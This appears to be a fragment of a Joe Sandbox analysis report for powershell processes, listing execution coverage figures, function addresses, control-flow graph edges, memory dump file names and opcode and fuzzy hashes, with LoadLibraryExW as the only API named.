
                                                                                Execution Graph

                                                                                Execution Coverage:2.8%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:3
                                                                                Total number of Limit Nodes:0
                                                                                execution_graph 10412 7ff7bff09f84 10413 7ff7bff09f8d LoadLibraryExW 10412->10413 10415 7ff7bff0a03d 10413->10415

                                                                                Executed Functions

                                                                                Function 00007FF7BFEFEFA6 Relevance: .5, Instructions: 473COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 118 7ff7bfefefa6-7ff7bfefefb3 119 7ff7bfefefb5-7ff7bfefefbd 118->119 120 7ff7bfefefbe-7ff7bfeff087 118->120 119->120 123 7ff7bfeff0f3 120->123 124 7ff7bfeff089-7ff7bfeff092 120->124 126 7ff7bfeff0f5-7ff7bfeff11a 123->126 124->123 125 7ff7bfeff094-7ff7bfeff0a0 124->125 127 7ff7bfeff0a2-7ff7bfeff0b4 125->127 128 7ff7bfeff0d9-7ff7bfeff0f1 125->128 132 7ff7bfeff186 126->132 133 7ff7bfeff11c-7ff7bfeff125 126->133 129 7ff7bfeff0b6 127->129 130 7ff7bfeff0b8-7ff7bfeff0cb 127->130 128->126 129->130 130->130 134 7ff7bfeff0cd-7ff7bfeff0d5 130->134 136 7ff7bfeff188-7ff7bfeff230 132->136 133->132 135 7ff7bfeff127-7ff7bfeff133 133->135 134->128 137 7ff7bfeff135-7ff7bfeff147 135->137 138 7ff7bfeff16c-7ff7bfeff184 135->138 147 7ff7bfeff232-7ff7bfeff23c 136->147 148 7ff7bfeff29e 136->148 139 7ff7bfeff14b-7ff7bfeff15e 137->139 140 7ff7bfeff149 137->140 138->136 139->139 142 7ff7bfeff160-7ff7bfeff168 139->142 140->139 142->138 147->148 149 7ff7bfeff23e-7ff7bfeff24b 147->149 150 7ff7bfeff2a0-7ff7bfeff2c9 148->150 151 7ff7bfeff284-7ff7bfeff29c 149->151 152 7ff7bfeff24d-7ff7bfeff25f 149->152 157 7ff7bfeff333 150->157 158 7ff7bfeff2cb-7ff7bfeff2d6 150->158 151->150 153 7ff7bfeff263-7ff7bfeff276 152->153 154 7ff7bfeff261 152->154 153->153 156 7ff7bfeff278-7ff7bfeff280 153->156 154->153 156->151 159 7ff7bfeff335-7ff7bfeff3db 157->159 158->157 160 7ff7bfeff2d8-7ff7bfeff2e6 158->160 169 7ff7bfeff3e3-7ff7bfeff41d call 7ff7bfeff464 159->169 170 7ff7bfeff3dd 159->170 161 7ff7bfeff31f-7ff7bfeff331 160->161 162 7ff7bfeff2e8-7ff7bfeff2fa 160->162 161->159 164 7ff7bfeff2fe-7ff7bfeff311 162->164 165 7ff7bfeff2fc 162->165 164->164 166 7ff7bfeff313-7ff7bfeff31b 164->166 165->164 166->161 176 7ff7bfeff422-7ff7bfeff448 169->176 170->169 177 7ff7bfeff44f-7ff7bfeff463 176->177 178 7ff7bfeff44a 176->178 178->177
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1785069891.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ff7bfef0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 37f463c6893f5465d0bf15031067a131cc2471e116fadc50356e603e14a4b17a
                                                                                • Instruction ID: 353a49b8557ed49b9933a8b9183bb66ccee3bdf8238d0919f9c9cc639d03f462
                                                                                • Opcode Fuzzy Hash: 37f463c6893f5465d0bf15031067a131cc2471e116fadc50356e603e14a4b17a
                                                                                • Instruction Fuzzy Hash: FAF19530908A8D8FEBA8EF28C8557F977E1FFA5310F44436AD84DC7295DB3499458B81
                                                                                Function 00007FF7BFEFFD52 Relevance: .5, Instructions: 459COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 179 7ff7bfeffd52-7ff7bfeffd5f 180 7ff7bfeffd61-7ff7bfeffd69 179->180 181 7ff7bfeffd6a-7ff7bfeffe37 179->181 180->181 184 7ff7bfeffea3 181->184 185 7ff7bfeffe39-7ff7bfeffe42 181->185 186 7ff7bfeffea5-7ff7bfeffeca 184->186 185->184 187 7ff7bfeffe44-7ff7bfeffe50 185->187 194 7ff7bfefff36 186->194 195 7ff7bfeffecc-7ff7bfeffed5 186->195 188 7ff7bfeffe52-7ff7bfeffe64 187->188 189 7ff7bfeffe89-7ff7bfeffea1 187->189 190 7ff7bfeffe66 188->190 191 7ff7bfeffe68-7ff7bfeffe7b 188->191 189->186 190->191 191->191 193 7ff7bfeffe7d-7ff7bfeffe85 191->193 193->189 196 7ff7bfefff38-7ff7bfefff5d 194->196 195->194 197 7ff7bfeffed7-7ff7bfeffee3 195->197 203 7ff7bfefff5f-7ff7bfefff69 196->203 204 7ff7bfefffcb 196->204 198 7ff7bfeffee5-7ff7bfeffef7 197->198 199 7ff7bfefff1c-7ff7bfefff34 197->199 201 7ff7bfeffefb-7ff7bfefff0e 198->201 202 7ff7bfeffef9 198->202 199->196 201->201 205 7ff7bfefff10-7ff7bfefff18 201->205 202->201 203->204 206 7ff7bfefff6b-7ff7bfefff78 203->206 207 7ff7bfefffcd-7ff7bfeffffb 204->207 205->199 208 7ff7bfefffb1-7ff7bfefffc9 206->208 209 7ff7bfefff7a-7ff7bfefff8c 206->209 214 7ff7bfeffffd-7ff7bff00008 207->214 215 7ff7bff0006b 207->215 208->207 210 7ff7bfefff90-7ff7bfefffa3 209->210 211 7ff7bfefff8e 209->211 210->210 213 7ff7bfefffa5-7ff7bfefffad 210->213 211->210 213->208 214->215 216 7ff7bff0000a-7ff7bff00018 214->216 217 7ff7bff0006d-7ff7bff0015a 215->217 218 7ff7bff00051-7ff7bff00069 216->218 219 7ff7bff0001a-7ff7bff0002c 216->219 228 7ff7bff00162-7ff7bff0017c 217->228 229 7ff7bff0015c 217->229 218->217 220 7ff7bff00030-7ff7bff00043 219->220 221 7ff7bff0002e 219->221 220->220 223 7ff7bff00045-7ff7bff0004d 220->223 221->220 223->218 232 7ff7bff00185-7ff7bff001c4 call 7ff7bff001e0 228->232 229->228 236 7ff7bff001c6 232->236 237 7ff7bff001cb-7ff7bff001df 232->237 236->237
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1785069891.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ff7bfef0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b5c26950d657e450d4ff68937eccf93445bbe29bdcf973b120597513ec022d45
                                                                                • Instruction ID: ab79643f8668ca068dfac498a5d7018c4821541556e6352c0b5076cc157a05b9
                                                                                • Opcode Fuzzy Hash: b5c26950d657e450d4ff68937eccf93445bbe29bdcf973b120597513ec022d45
                                                                                • Instruction Fuzzy Hash: CBE1C530908A8E8FEBA8EF2CC8557F977D1FFA5310F44426AE84DC7295CE7499458B81
                                                                                Function 00007FF7BFF09F84 Relevance: 1.6, APIs: 1, Instructions: 115libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1785069891.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ff7bfef0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 1d09fe01e26a054624260182c8f659ce4803bd74f1c3c8ef499d3cdddec06b56
                                                                                • Instruction ID: 9e839320a3f79cf42e6951b3f3e3ac245dfacff01200f9c24d974a03b8f52ad7
                                                                                • Opcode Fuzzy Hash: 1d09fe01e26a054624260182c8f659ce4803bd74f1c3c8ef499d3cdddec06b56
                                                                                • Instruction Fuzzy Hash: 3D31E67190CA4D8FDB19DF6CD845BE9BBE0FB66321F04426BD009C3256DB74A405CB91
                                                                                Function 00007FF7BFFCA241 Relevance: .6, Instructions: 605COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 15 7ff7bffca241-7ff7bffca24d 16 7ff7bffca24f 15->16 17 7ff7bffca251-7ff7bffca28b 15->17 16->17 18 7ff7bffca291-7ff7bffca2b4 16->18 20 7ff7bffca28d-7ff7bffca28f 17->20 21 7ff7bffca2b7-7ff7bffca2c5 17->21 18->21 20->18 23 7ff7bffca3c3-7ff7bffca3f3 21->23 24 7ff7bffca2cb-7ff7bffca2d5 21->24 31 7ff7bffca3f5-7ff7bffca41d 23->31 32 7ff7bffca41f-7ff7bffca467 23->32 25 7ff7bffca2ee-7ff7bffca2f2 24->25 26 7ff7bffca2d7-7ff7bffca2ec 24->26 29 7ff7bffca2f4-7ff7bffca2f7 25->29 30 7ff7bffca36d-7ff7bffca377 25->30 26->25 29->30 33 7ff7bffca2f9-7ff7bffca302 29->33 34 7ff7bffca383-7ff7bffca3c0 30->34 35 7ff7bffca379-7ff7bffca382 30->35 31->32 39 7ff7bffca46d-7ff7bffca477 32->39 40 7ff7bffca737-7ff7bffca76d 32->40 33->30 34->23 41 7ff7bffca493-7ff7bffca4a0 39->41 42 7ff7bffca479-7ff7bffca491 39->42 52 7ff7bffca76f-7ff7bffca797 40->52 53 7ff7bffca798-7ff7bffca7d8 40->53 50 7ff7bffca6d3-7ff7bffca6dd 41->50 51 7ff7bffca4a6-7ff7bffca4a9 41->51 42->41 56 7ff7bffca6df-7ff7bffca6eb 50->56 57 7ff7bffca6ec-7ff7bffca734 50->57 51->50 54 7ff7bffca4af-7ff7bffca4bb 51->54 52->53 54->40 59 7ff7bffca4c1-7ff7bffca4cb 54->59 57->40 60 7ff7bffca4e4-7ff7bffca4e9 59->60 61 7ff7bffca4cd-7ff7bffca4da 59->61 60->50 66 7ff7bffca4ef-7ff7bffca4f4 60->66 61->60 67 7ff7bffca4dc-7ff7bffca4e2 61->67 68 7ff7bffca4f6-7ff7bffca50d 66->68 69 7ff7bffca50f 66->69 67->60 72 7ff7bffca511-7ff7bffca513 68->72 69->72 72->50 74 7ff7bffca519-7ff7bffca51c 72->74 75 7ff7bffca543 74->75 76 7ff7bffca51e-7ff7bffca535 74->76 77 7ff7bffca545-7ff7bffca547 75->77 85 7ff7bffca580-7ff7bffca592 76->85 86 7ff7bffca537-7ff7bffca541 76->86 77->50 79 7ff7bffca54d-7ff7bffca559 77->79 81 7ff7bffca55b-7ff7bffca57f 79->81 82 7ff7bffca5a7-7ff7bffca5a8 79->82 81->85 83 7ff7bffca5b8 82->83 84 7ff7bffca5aa-7ff7bffca5b4 82->84 91 7ff7bffca5bd-7ff7bffca5ca 83->91 88 7ff7bffca5d4-7ff7bffca5e0 84->88 89 7ff7bffca5b6 84->89 85->50 101 7ff7bffca598-7ff7bffca5a4 85->101 86->77 95 7ff7bffca5e2-7ff7bffca5f2 88->95 96 7ff7bffca62b-7ff7bffca685 88->96 89->91 91->88 99 7ff7bffca5cc-7ff7bffca5d2 91->99 95->83 100 7ff7bffca5f4-7ff7bffca5fe 95->100 109 7ff7bffca6a5-7ff7bffca6a6 96->109 110 7ff7bffca687-7ff7bffca6a3 96->110 99->88 102 7ff7bffca600-7ff7bffca615 100->102 103 7ff7bffca617-7ff7bffca62a 100->103 101->82 102->103 103->96 112 7ff7bffca6ae-7ff7bffca6ba 109->112 110->109 114 7ff7bffca6c2-7ff7bffca6c7 112->114 115 7ff7bffca6bc-7ff7bffca6c0 112->115 116 7ff7bffca6c8-7ff7bffca6d2 114->116 115->116
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1788373406.00007FF7BFFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFC0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ff7bffc0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c91e1e52867a6d7f838b687d245481b2ea4de79835da0d23d9d758dee61c9a83
                                                                                • Instruction ID: 279e46371ffb90ba3250b65df41a9976267817453adfc629196a7e05f9b03377
                                                                                • Opcode Fuzzy Hash: c91e1e52867a6d7f838b687d245481b2ea4de79835da0d23d9d758dee61c9a83
                                                                                • Instruction Fuzzy Hash: C9024431A0CAD94FE795EF6C84642F4BBE1EF66B21F4805BAC15DC7197DA29AC01C350
                                                                                Function 00007FF7BFFC3755 Relevance: .4, Instructions: 431COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 238 7ff7bffc3755-7ff7bffc37e4 241 7ff7bffc37ea-7ff7bffc37f4 238->241 242 7ff7bffc3a4c-7ff7bffc3b0b 238->242 243 7ff7bffc37f6-7ff7bffc3803 241->243 244 7ff7bffc380d-7ff7bffc3812 241->244 243->244 251 7ff7bffc3805-7ff7bffc380b 243->251 246 7ff7bffc39f0-7ff7bffc39fa 244->246 247 7ff7bffc3818-7ff7bffc381b 244->247 249 7ff7bffc3a09-7ff7bffc3a49 246->249 250 7ff7bffc39fc-7ff7bffc3a08 246->250 252 7ff7bffc3832 247->252 253 7ff7bffc381d-7ff7bffc3830 247->253 249->242 251->244 256 7ff7bffc3834-7ff7bffc3836 252->256 253->256 256->246 259 7ff7bffc383c-7ff7bffc3870 256->259 270 7ff7bffc3872-7ff7bffc3885 259->270 271 7ff7bffc3887 259->271 274 7ff7bffc3889-7ff7bffc388b 270->274 271->274 274->246 275 7ff7bffc3891-7ff7bffc3899 274->275 275->242 277 7ff7bffc389f-7ff7bffc38a9 275->277 278 7ff7bffc38c5-7ff7bffc38d5 277->278 279 7ff7bffc38ab-7ff7bffc38c3 277->279 278->246 282 7ff7bffc38db-7ff7bffc390c 278->282 279->278 282->246 288 7ff7bffc3912-7ff7bffc393e 282->288 292 7ff7bffc3940-7ff7bffc3967 288->292 293 7ff7bffc3969 288->293 294 7ff7bffc396b-7ff7bffc396d 292->294 293->294 294->246 295 7ff7bffc3973-7ff7bffc397b 294->295 297 7ff7bffc397d-7ff7bffc3987 295->297 298 7ff7bffc398b 295->298 300 7ff7bffc3989 297->300 301 7ff7bffc39a7-7ff7bffc39d6 297->301 302 7ff7bffc3990-7ff7bffc39a0 298->302 300->302 307 7ff7bffc39dd-7ff7bffc39ef 301->307 305 7ff7bffc39a2-7ff7bffc39a4 302->305 306 7ff7bffc39a5 302->306 305->306 306->301
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1788373406.00007FF7BFFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFC0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ff7bffc0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0bdaaa6e6292868e45e80fec2541ff8581d77ed1831a39ef2d014bad75a985ce
                                                                                • Instruction ID: b739e836ff78550eca9e77cfc343fb22ea1da9b9f7d8574796df14ca18cdd8e9
                                                                                • Opcode Fuzzy Hash: 0bdaaa6e6292868e45e80fec2541ff8581d77ed1831a39ef2d014bad75a985ce
                                                                                • Instruction Fuzzy Hash: DDD19731A0DADA4FE795EF6C48151F9BBA1EF16760B4806FEC05DC70D3CA18A815C361
                                                                                Function 00007FF7BFFCA420 Relevance: .3, Instructions: 296COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 396 7ff7bffca420-7ff7bffca467 398 7ff7bffca46d-7ff7bffca477 396->398 399 7ff7bffca737-7ff7bffca76d 396->399 400 7ff7bffca493-7ff7bffca4a0 398->400 401 7ff7bffca479-7ff7bffca491 398->401 409 7ff7bffca76f-7ff7bffca797 399->409 410 7ff7bffca798-7ff7bffca7d8 399->410 407 7ff7bffca6d3-7ff7bffca6dd 400->407 408 7ff7bffca4a6-7ff7bffca4a9 400->408 401->400 413 7ff7bffca6df-7ff7bffca6eb 407->413 414 7ff7bffca6ec-7ff7bffca734 407->414 408->407 411 7ff7bffca4af-7ff7bffca4bb 408->411 409->410 411->399 416 7ff7bffca4c1-7ff7bffca4cb 411->416 414->399 417 7ff7bffca4e4-7ff7bffca4e9 416->417 418 7ff7bffca4cd-7ff7bffca4da 416->418 417->407 423 7ff7bffca4ef-7ff7bffca4f4 417->423 418->417 424 7ff7bffca4dc-7ff7bffca4e2 418->424 425 7ff7bffca4f6-7ff7bffca50d 423->425 426 7ff7bffca50f 423->426 424->417 429 7ff7bffca511-7ff7bffca513 425->429 426->429 429->407 431 7ff7bffca519-7ff7bffca51c 429->431 432 7ff7bffca543 431->432 433 7ff7bffca51e-7ff7bffca535 431->433 434 7ff7bffca545-7ff7bffca547 432->434 442 7ff7bffca580-7ff7bffca592 433->442 443 7ff7bffca537-7ff7bffca541 433->443 434->407 436 7ff7bffca54d-7ff7bffca559 434->436 438 7ff7bffca55b-7ff7bffca57f 436->438 439 7ff7bffca5a7-7ff7bffca5a8 436->439 438->442 440 7ff7bffca5b8 439->440 441 7ff7bffca5aa-7ff7bffca5b4 439->441 448 7ff7bffca5bd-7ff7bffca5ca 440->448 445 7ff7bffca5d4-7ff7bffca5e0 441->445 446 7ff7bffca5b6 441->446 442->407 458 7ff7bffca598-7ff7bffca5a4 442->458 443->434 452 7ff7bffca5e2-7ff7bffca5f2 445->452 453 7ff7bffca62b-7ff7bffca685 445->453 446->448 448->445 456 7ff7bffca5cc-7ff7bffca5d2 448->456 452->440 457 7ff7bffca5f4-7ff7bffca5fe 452->457 466 7ff7bffca6a5-7ff7bffca6a6 453->466 467 7ff7bffca687-7ff7bffca6a3 453->467 456->445 459 7ff7bffca600-7ff7bffca615 457->459 460 7ff7bffca617-7ff7bffca62a 457->460 458->439 459->460 460->453 469 7ff7bffca6ae-7ff7bffca6ba 466->469 467->466 471 7ff7bffca6c2-7ff7bffca6c7 469->471 472 7ff7bffca6bc-7ff7bffca6c0 469->472 473 7ff7bffca6c8-7ff7bffca6d2 471->473 472->473
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1788373406.00007FF7BFFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFC0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ff7bffc0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d8d94950a6e2b7e48a8831e50ab2959d420a83b7a88683ee447c6095341e4f70
                                                                                • Instruction ID: d058072fb9fc4d6d6ef107b54b86e1e1124754e73f13a0240ed753965a22baa9
                                                                                • Opcode Fuzzy Hash: d8d94950a6e2b7e48a8831e50ab2959d420a83b7a88683ee447c6095341e4f70
                                                                                • Instruction Fuzzy Hash: C1910231E08A9A4FE794EF5C84642B8F7E1FF66B16F8409BAD51DC3296CE24BC418750

                                                                                Non-executed Functions

                                                                                Function 00007FF7BFF00EFA Relevance: 2.7, Strings: 2, Instructions: 196COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1785069891.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ff7bfef0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 5K_^$`c4
                                                                                • API String ID: 0-3352721459
                                                                                • Opcode ID: 40f1b21901c1da0cba3e37044ee9ec07390ebefeb2d2cdb82f3cea4698556303
                                                                                • Instruction ID: ee0f890a7e091b3c9ba7fa772e737bd16a5a65dd46f75caace07e7b532a26700
                                                                                • Opcode Fuzzy Hash: 40f1b21901c1da0cba3e37044ee9ec07390ebefeb2d2cdb82f3cea4698556303
                                                                                • Instruction Fuzzy Hash: 0B511173D0C5661DEA157BBCB8510F9A720EF123BAF0483B3D26CCE08B9D18745252E8
                                                                                Function 00007FF7BFF00ED1 Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1785069891.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ff7bfef0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: `c4
                                                                                • API String ID: 0-4097900969
                                                                                • Opcode ID: 7ba0ceb1dabd1a46f68678e584af1f502ff890c0c40f163c006ee1e7474948f9
                                                                                • Instruction ID: 0edeaf8aece25a12d5b86378093122678115adc88c2b60c4a9155618c9293fc9
                                                                                • Opcode Fuzzy Hash: 7ba0ceb1dabd1a46f68678e584af1f502ff890c0c40f163c006ee1e7474948f9
                                                                                • Instruction Fuzzy Hash: 3651E173D0C5661DEA157BBCB8510F9E720EF523BAF0483B3D25C8E08B9D18745652E8
                                                                                Function 00007FF7BFF0C99C Relevance: .7, Instructions: 747COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1785069891.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ff7bfef0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 76401f08d8a560cb2f797038ee50cd7bd675e265af0cb74f048a94e164be1863
                                                                                • Instruction ID: 1545db075f41e16b79f3d17b9ee2f7346fde312fe00c46b7e22f336bcade1fa1
                                                                                • Opcode Fuzzy Hash: 76401f08d8a560cb2f797038ee50cd7bd675e265af0cb74f048a94e164be1863
                                                                                • Instruction Fuzzy Hash: B842143090CAC94FEB68EF28C8157E8B7E0FF66701F44417ED95DCB296DA34A9068791
                                                                                Function 00007FF7BFF0CA25 Relevance: .6, Instructions: 598COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1785069891.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ff7bfef0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fd2e7b475d4b777cef3cd07e663abcde0c24e2926bf77b97d7ce97c645b67e4e
                                                                                • Instruction ID: 531c920780fabd6b3fe23d25d402f161a9817ec301945b1e88e9b753c2c7c160
                                                                                • Opcode Fuzzy Hash: fd2e7b475d4b777cef3cd07e663abcde0c24e2926bf77b97d7ce97c645b67e4e
                                                                                • Instruction Fuzzy Hash: 30120530918A8A8FEBA8EF6CC845BF8B7D0FF69701F40417AD91DC7295DE34A9058791
                                                                                Function 00007FF7BFEFEAA9 Relevance: .4, Instructions: 413COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1785069891.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ff7bfef0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b4c3b90a4ac9b604b6ddc0e0548d36d4513b2da3e159d0ecdb8cd05a220f3871
                                                                                • Instruction ID: e8aa78439ae6db7e73cd76810f13496cb469e6738546f425bfa46251881300f1
                                                                                • Opcode Fuzzy Hash: b4c3b90a4ac9b604b6ddc0e0548d36d4513b2da3e159d0ecdb8cd05a220f3871
                                                                                • Instruction Fuzzy Hash: 03D1D530908A8D8FEB68EF28D8557F977E1FF95310F44426EE84DC7295CB74A9448B82
                                                                                Function 00007FF7BFF0B1FA Relevance: .1, Instructions: 117COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1785069891.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ff7bfef0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5fc1d024938254532c71fb2d70bd69190d1c310a41c2794438a3acbbac95576f
                                                                                • Instruction ID: c204c93f40e0506ae39aa8fe06b0a30e27f9a8955b3c83c6d64fd1bd5e0e252d
                                                                                • Opcode Fuzzy Hash: 5fc1d024938254532c71fb2d70bd69190d1c310a41c2794438a3acbbac95576f
                                                                                • Instruction Fuzzy Hash: DC218E3B64C9270EA702FB6DB8652E93352DFD0371B44C777D288CE05BD914689B86E8

                                                                                Execution Graph

                                                                                Execution Coverage:3.2%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:3
                                                                                Total number of Limit Nodes:0
                                                                                execution_graph 8670 7ff7bfee6c34 8671 7ff7bfee6c3d LoadLibraryExW 8670->8671 8673 7ff7bfee6ced 8671->8673

                                                                                Executed Functions

                                                                                Function 00007FF7BFEE6C34 Relevance: 1.6, APIs: 1, Instructions: 117libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 129 7ff7bfee6c34-7ff7bfee6c3b 130 7ff7bfee6c46-7ff7bfee6caf 129->130 131 7ff7bfee6c3d-7ff7bfee6c45 129->131 133 7ff7bfee6cb1-7ff7bfee6cb6 130->133 134 7ff7bfee6cb9-7ff7bfee6ceb LoadLibraryExW 130->134 131->130 133->134 135 7ff7bfee6cf3-7ff7bfee6d1a 134->135 136 7ff7bfee6ced 134->136 136->135
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1954981292.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7ff7bfed0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 6d01bdde7e3a99039088becda08c767da753f674f76c367dfaec6e34ffa08b7a
                                                                                • Instruction ID: 795b5ddd7cce1d33aad74d799b35e074a72a7ae573bc9d29acc942ccf25a350a
                                                                                • Opcode Fuzzy Hash: 6d01bdde7e3a99039088becda08c767da753f674f76c367dfaec6e34ffa08b7a
                                                                                • Instruction Fuzzy Hash: F531F47190CA4C8FDB49DB9CD849BE9BBE0EB66320F04422BD009D3252DB70A8158B91
                                                                                Function 00007FF7BFFA3413 Relevance: .4, Instructions: 400COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 310 7ff7bffa3413-7ff7bffa3464 311 7ff7bffa346a-7ff7bffa3474 310->311 312 7ff7bffa36cc-7ff7bffa378b 310->312 313 7ff7bffa3476-7ff7bffa3483 311->313 314 7ff7bffa348d-7ff7bffa3492 311->314 313->314 321 7ff7bffa3485-7ff7bffa348b 313->321 316 7ff7bffa3670-7ff7bffa367a 314->316 317 7ff7bffa3498-7ff7bffa349b 314->317 319 7ff7bffa3689-7ff7bffa36c9 316->319 320 7ff7bffa367c-7ff7bffa3688 316->320 322 7ff7bffa34b2 317->322 323 7ff7bffa349d-7ff7bffa34b0 317->323 319->312 321->314 326 7ff7bffa34b4-7ff7bffa34b6 322->326 323->326 326->316 329 7ff7bffa34bc-7ff7bffa34f0 326->329 340 7ff7bffa34f2-7ff7bffa3505 329->340 341 7ff7bffa3507 329->341 344 7ff7bffa3509-7ff7bffa350b 340->344 341->344 344->316 346 7ff7bffa3511-7ff7bffa3519 344->346 346->312 347 7ff7bffa351f-7ff7bffa3529 346->347 348 7ff7bffa3545-7ff7bffa3555 347->348 349 7ff7bffa352b-7ff7bffa3543 347->349 348->316 352 7ff7bffa355b-7ff7bffa358c 348->352 349->348 352->316 358 7ff7bffa3592-7ff7bffa35be 352->358 362 7ff7bffa35c0-7ff7bffa35e7 358->362 363 7ff7bffa35e9 358->363 364 7ff7bffa35eb-7ff7bffa35ed 362->364 363->364 364->316 365 7ff7bffa35f3-7ff7bffa35fb 364->365 367 7ff7bffa360b 365->367 368 7ff7bffa35fd-7ff7bffa3607 365->368 372 7ff7bffa3610-7ff7bffa3625 367->372 370 7ff7bffa3627-7ff7bffa3656 368->370 371 7ff7bffa3609 368->371 375 7ff7bffa365d-7ff7bffa366f 370->375 371->372 372->370
                                                                                Memory Dump Source
